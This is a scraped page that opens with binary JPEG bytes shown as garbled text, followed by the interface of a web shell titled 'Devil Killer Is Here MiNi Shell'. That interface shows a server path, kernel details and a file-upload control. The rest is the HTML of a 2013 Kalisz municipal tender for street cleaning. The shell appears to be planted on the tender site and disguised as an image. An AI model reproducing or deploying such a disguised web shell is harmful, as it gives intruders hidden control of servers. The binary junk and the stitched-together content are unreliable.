JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130301/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130301/32497-N-2013.html

<p class="kh_header"><b>Kalisz: Oczyszczanie ulic na terenie miasta Kalisza</b><br>
<b>Numer ogłoszenia: 32497 - 2013; data zamieszczenia: 01.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg  Miejskich , ul. Złota 43, 62-800 Kalisz, woj. wielkopolskie, tel. 62 59 85 200, faks 62 59 85 201.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdm.kalisz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Oczyszczanie ulic na terenie miasta Kalisza.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zgodnie z treścią zapisów Siwz:
4.2. Zakres rzeczowy przedmiotu zamówienia obejmuje: 1.401.489,00 mb 
4.3. Przedmiot zamówienia obejmuje w szczególności : 
4.3.1. mechaniczne oczyszczanie na mokro jezdni z odpadów 
4.3.2. mechaniczne oczyszczanie na mokro zatok parkingowych i postojowych, oraz zatok 
          autobusowych 
4.3.3. ręczne oczyszczanie jezdni, zatok parkingowych i postojowych oraz 
         autobusowych 
4.3.4.zbieranie i pozbywanie się odpadów z pasów drogowych
4.3.4. usuwanie, transport oraz przekazywanie do składowania i unieszkodliwiania 
          odpadów usuniętych z terenu powierzonego do oczyszczania 
4.4.Oczyszczanie jezdni to usługa polegająca na usuwaniu piasku, błota, liści, kwiecia 
       i innych substancji sypkich oraz zanieczyszczeń z całej powierzchni jezdni, w tym z 
       całych powierzchni skrzyżowań (powierzchnię skrzyżowań wytyczają oznakowania 
       poziome przejść dla pieszych, wysepki rozjazdowe bądź zakończenia łuków ulic 
       poprzecznych ), z pól martwych, zatok parkingowych, postojowych i autobusowych. 
4.5.Przedmiotowa usługa obejmuje także ręczne zbieranie widocznych zabrudzeń typu 
      gałęzie, kamienie, opakowania, papiery, butelki, puszki oraz inne drobne odpady 
      komunalne, a także uszkodzone akcesoria samochodowe leżące na jezdni. 
4.6. Na oczyszczonej jezdni nie może być śladów przejazdu w postaci niezebranych 
      nieczystości. Na opaskach nie mogą być pozostawione przerosty trawy, chwastów oraz 
      piasku. Wykonawca musi zebrać i wywieźć wszelkie uprzątnięte zanieczyszczenia. 
4.7. Wykaz ulic do oczyszczania obejmuje załącznik do umowy stanowiący integralną część 
      Siwz. 
4.8. Usługa realizowana będzie: 
4.8.1. na ulicach z częstotliwością określoną w załącznikach nr 5 i 6 zgodnie
         z harmonogramem - zawierającym wykaz ulic i termin  ich  oczyszczania,  
         sporządzonym przez Wykonawcę  i zaakceptowanym przez  Zamawiającego
         Wykonawca jest zobowiązany dostarczy Zamawiającemu harmonogram w dniu 
         zawarcia umowy.
4.8.2. Zamawiający dopuszcza odstępstwa od terminów określonych w harmonogramie,    
         W przypadku konieczności wykonania na doraźne zlecenie Zamawiającego,
         dodatkowego oczyszczania ulic,  na skutek m.in.: panujących  warunków 
         atmosferycznych, świąt i uroczystości.
4.8.3. Wykonawca jest zobowiązany sporządzić harmonogram oczyszczania ulic 
          uwzględniając  m.in. następujące terminy oczyszczania  ulic określonych w załączniku 
          nr 6 (3 razy w roku) 
- pierwsze sprzątanie : od 15.03.2013 r. do 30.04.2013 r.
- drugie sprzątanie: od 01.07.2013 r. do 15.08.2013 r. 
- trzecie sprzątanie: od 01.10.2013 r. do 15.11.2013r. 
4.9.	Zamawiający zastrzega możliwość zwiększenia bądź zmniejszenia zakresu przedmiotu zamówienia w zakresie częstotliwości oczyszczania ulic  określonych 
w harmonogramie a także objęcie oczyszczaniem ulic nie ujętych w harmonogramie. 
4.10.	Prace związane z wykonywaniem przedmiotowej usługi, Wykonawca jest zobowiązany wykonywać w godzinach najmniejszego natężenia ruchu drogowego            z uwzględnieniem poniższych uwarunkowań:
a)	ulice osiedlowe  (określone w załączniku nr 6 - 3 razy w roku ) - zalecane godziny  dopołudniowe,
b)	ulice stanowiące główne ciągi komunikacyjne (określone w załączniku nr 5 - 2 razy w miesiącu) - zalecane godziny nocne
4.11.	Usługa świadczona na ulicach (określone w  załączniku nr 6  - 3 razy w roku), realizowana będzie w sposób obejmujący kompleksowe oczyszczanie danego osiedla, max w ciągu 2 dni. 
4.12.	Podstawowe definicje. 
4.12.1.	 oczyszczanie mechaniczne: rozumie się przez to sprzątanie przy zastosowaniu 
            maszyn czyszczących samobieżnych bądź ciągnionych przez pojazd 
            samochodowy, 
4.12.2.	oczyszczanie ręczne rozumie się przez to sprzątanie przy zastosowaniu 
            urządzeń mechanicznych (odkurzaczy przemysłowych, ręcznie prowadzonych 
            zamiatarek) lub mioteł 
4.12.3 zbieranie odpadów - rozumie się przez to gromadzenie odpadów przed ich transportem do miejsc przetwarzania, w tym wstępne sortowanie nieprowadzące do zasadniczej zmiany charakteru i składu odpadów i niepowodujące zmiany klasyfikacji odpadów oraz tymczasowe magazynowanie odpadów, o którym mowa w pkt 5 lit. b. (tj. tymczasowe magazynowanie odpadów przez prowadzącego zbieranie odpadów)
4.13.4. unieszkodliwianie odpadów - rozumie się przez to proces niebędący odzyskiem,      nawet jeżeli wtórnym skutkiem takiego procesu jest odzysk substancji lub energii
           
4.14 Wykonawca odpowiedzialny jest za powstałe w toku własnych prac odpady oraz 
za właściwy sposób postępowania z nimi, zgodnie z przepisami ustawy z dnia 14 grudnia  2012r. o odpadach (Dz. U. z 2013r. poz. 21 ) oraz ustawy z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2012r.poz. 391 z późn. zm.), Uchwałą  nr  XXIX/380/2012 Rady Miejskiej Kalisza z dnia 29 listopada 2012 r. 

Wywóz odpadów odbywa się na koszt Wykonawcy. 
4.15. Zaleca się, aby Wykonawca dokonał wizji lokalnej na terenie objętym przedmiotem 
         zamówienia. 
4.16. Przedmiot zamówienia nie obejmuje: 
        4.16.1/ uprzątania zanieczyszczeń z chodników 
        4.16.2/ obszaru pasa drogowego stanowiącego teren budowy - gdyż w takim   
                    przypadku obowiązek ten spoczywa na kierowniku budowy 
        4.16.3/ zbierania, transportu i unieszkodliwiania zwłok zwierząt lub ich części 
        4.16.4/ usuwania awaryjnych zabrudzeń zawierających substancje zakwalifikowane do 
                    odpadów niebezpiecznych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.61.00.00-6, 90.91.40.00-7, 90.50.00.00-2, 90.51.20.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zgodnie z treścią zapisów Siwz pkt.12:
12. Wadium.
12.1. Wykonawca zobowiązany jest do wniesienia wadium w wysokości 5.000,00 PLN
         ( pięć  tysięcy złotych 00/100) przed upływem terminu składania ofert.
12.2. Formę wniesienia wadium wybiera Wykonawca spośród przewidzianych w art. 45
         ust. 6 ustawy.
12.3. Wadium w pieniądzu (PLN) należy wnieść przelewem na konto Zarządu Dróg Miejskich 
         w Kaliszu, BRE Bank SA 11 1140 1993 0000 5508 1100 1005  z dopiskiem Wadium, 
         nr sprawy  ZP.271.1.2.2013.
12.4. W przypadku wnoszenia wadium w innych formach niż pieniężna oryginał dowodu ich
         wniesienia należy włożyć do koperty z ofertą w osobnej koszulce (nie wpinać trwale do
         oferty).
12.5. Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania
         rachunku Zamawiającego.
12.6. W przypadku składania przez Wykonawcę wadium w formie gwarancji, poręczenia z 
        ich treści musi jednoznacznie wynikać: nazwa zlecającego, beneficjenta gwarancji, 
        gwaranta wraz z adresami ich siedzib, określenie wierzytelności, która ma być 
        zabezpieczona gwarancją; kwota gwarancji; termin ważności gwarancji, bezwarunkowe 
        i nieodwołalne zobowiązanie gwaranta do zapłacenia kwoty gwarancji na pierwsze 
        pisemne żądanie Zamawiającego w przypadku zaistnienia przesłanek, o których mowa 
       w art. 46 ust. 4a i 5 ustawy.
12.7. Kserokopie dowodu wpłaty wniesienia wadium np. dowód przelania pieniędzy na konto
         Zamawiającego czy kserokopie gwarancji bankowej, ubezpieczeniowej należy wpiąć
         trwale do oferty. Kserokopia ta winna być poświadczona za zgodność z oryginałem 
         przez osobę/y uprawnioną/e do reprezentowania Wykonawcy.
12.8. Wykonawca traci wadium wraz z odsetkami w przypadku zaistnienia przesłanek, 
         o których mowa w art. 46 ust.4a i 5 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-1/ w zakresie posiadania uprawnień do wykonywania określonej działalności lub 
    czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, przedłożą: 

- aktualną na dzień składania ofert decyzję starosty właściwego ze względu na miejsce 
  siedziby lub zamieszkania transportującego odpady, zezwalającą na prowadzenie 
  działalności w zakresie transportu odpadów komunalnych (o kodach 20 02 01, 20 02 02, 
  20 02 03, 20 03 01, 20 03 03, 20 03 99) 

- aktualną na dzień składania ofert decyzję Prezydenta Miasta właściwego ze względu na 
  miejsce odbioru odpadów zezwalającą na odbiór odpadów komunalnych 
  (o kodach 20 02 01, 20 02 02, 20 02 03, 20 03 01, 20 03 03, 20 03 99)*

- aktualną na dzień składania ofert decyzję starosty właściwego ze względu na 
  miejsce zbierania odpadów zezwalającą na zbieranie odpadów komunalnych (o kodach 
  20 02 01, 20 02 02, 20 02 03, 20 03 01, 20 03 03, 20 03 99)* 

* W przypadku bezpośredniego tj. bez uprzedniego magazynowania, wywozu odpadów na składowisko nie jest wymagane posiadanie przez ubiegającego się o zamówienie, 
zezwolenia na zbieranie odpadów. 
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wykazują łącznie spełnienie warunku dotyczącego posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na potwierdzenie spełnienia warunku określonego w art. 22 ust. 1 pkt. 2):
    - wykażą w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli
      okres prowadzenia działalności jest krótszy - w tym okresie wykonanie usług  
      polegających na oczyszczaniu ulic o łącznej wartości nie mniejszej niż 
      150.000,00 zł brutto.
     
      Zamawiający wymaga, aby usługi  te zostały wykonane  należycie.

Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wykazują łącznie spełnienie warunku dotyczącego posiadania wiedzy i doświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku określonego w art. 22 ust. 1 pkt.3):
 - wskażą że dysponują lub będą dysponować przynajmniej następującymi narzędziami 
   i urządzeniami niezbędnymi do wykonania zamówienia tj.:
          - zamiatarką mechaniczną bezpyłową z funkcją zraszania do obsługi ciągów ulicznych 
             pasów jezdnych
          - zamiatarką mechaniczna bezpyłową z funkcją zraszania do obsługi wąskich ciągów 
             ulicznych pasów jezdnych, wyposażoną w ssawę do czyszczenia powierzchni 
             nierównych i trudnodostępnych
          - pojazdem przystosowanym do transportu odpadów

Sprzęt, o którym mowa wyżej musi spełniać wymagania przepisów ochrony środowiska odnośnie ochrony przed hałasem.

Sprzęt musi być wyposażony w sygnały ostrzegawcze, informujące kierowców  
o utrudnieniach spowodowanych oczyszczaniem ulic.

Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wykazują łącznie spełnienie warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- wykażą, że posiadają (aktualne i opłacone przynajmniej na dzień składania ofert)
  ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej
  działalności gospodarczej związanej z przedmiotem zamówienia.

Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wykazują łącznie spełnienie warunku dotyczącego sytuacji ekonomicznej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art.24 
          ust.2 pkt.5, albo informację o tym, że nie należy do grupy kapitałowej</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z treścią zapisów Siwz pkt. 21 oraz § 15  projektu umowy:
21.	Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy, ogólne warunki umowy albo wzór umowy, jeżeli Zamawiający wymaga od Wykonawcy, aby zawarł z nim umowę na takich warunkach.

21.1.	Wykonawca zobowiązany jest do podpisania umowy na warunkach podanych     
   w  projekcie umowy stanowiącym załącznik do SIWZ.
21.2.	Zamawiający dopuszcza zmianę treści zawartej umowy 
w następujących przypadkach:

a)	zmiany przepisów prawa powszechnie obowiązującego, jeśli zmiana ta
wpływa  na zakres lub warunki wykonania przez strony świadczeń wynikających z umowy;
b)	zmian w zakresie parametrów techniczno - eksploatacyjnych urządzeń, warunków gwarancji, o ile są one dla Zamawiającego korzystne (nie gorsze od zawartych    w ofercie Wykonawcy) i obiektywnie uzasadnione
§ 15
1.Wszelkie zmiany niniejszej umowy wymagają formy pisemnego aneksu pod 
   rygorem nieważności i mogą zostać dokonane, o ile nie stoją w sprzeczności
   z regulacjami zawartymi w ustawie Prawo zamówień publicznych. 
2.Zamawiający dopuszcza zmianę treści zawartej umowy w następujących 
   przypadkach:
a) zmiany przepisów prawa powszechnie obowiązującego, jeśli zmiana ta wpływa
    na zakres lub warunki wykonania przez strony świadczeń wynikających z umowy;
b) zmian w zakresie parametrów techniczno - eksploatacyjnych urządzeń, warunków
    gwarancji, o ile są one dla Zamawiającego korzystne (nie gorsze od zawartych
    w ofercie Wykonawcy) i obiektywnie uzasadnione.
3.W sprawach nieuregulowanych niniejszą umową mają zastosowanie odpowiednie     
   przepisy Kodeksu Cywilnego i innych ustaw i aktów prawnych  o ile przepisy ustawy Prawo 
   zamówień publicznych nie stanowią inaczej.
4.Ewentualne spory mogące wyniknąć z realizacji niniejszej umowy strony 
   zobowiązują się rozwiązywać polubownie, w drodze negocjacji. 
   W razie braku porozumienia spory będzie rozstrzygał sąd powszechny właściwy 
   dla siedziby Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdm.kalisz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Miejskich ul. Złota 43, 62-800 Kalisz.</p>
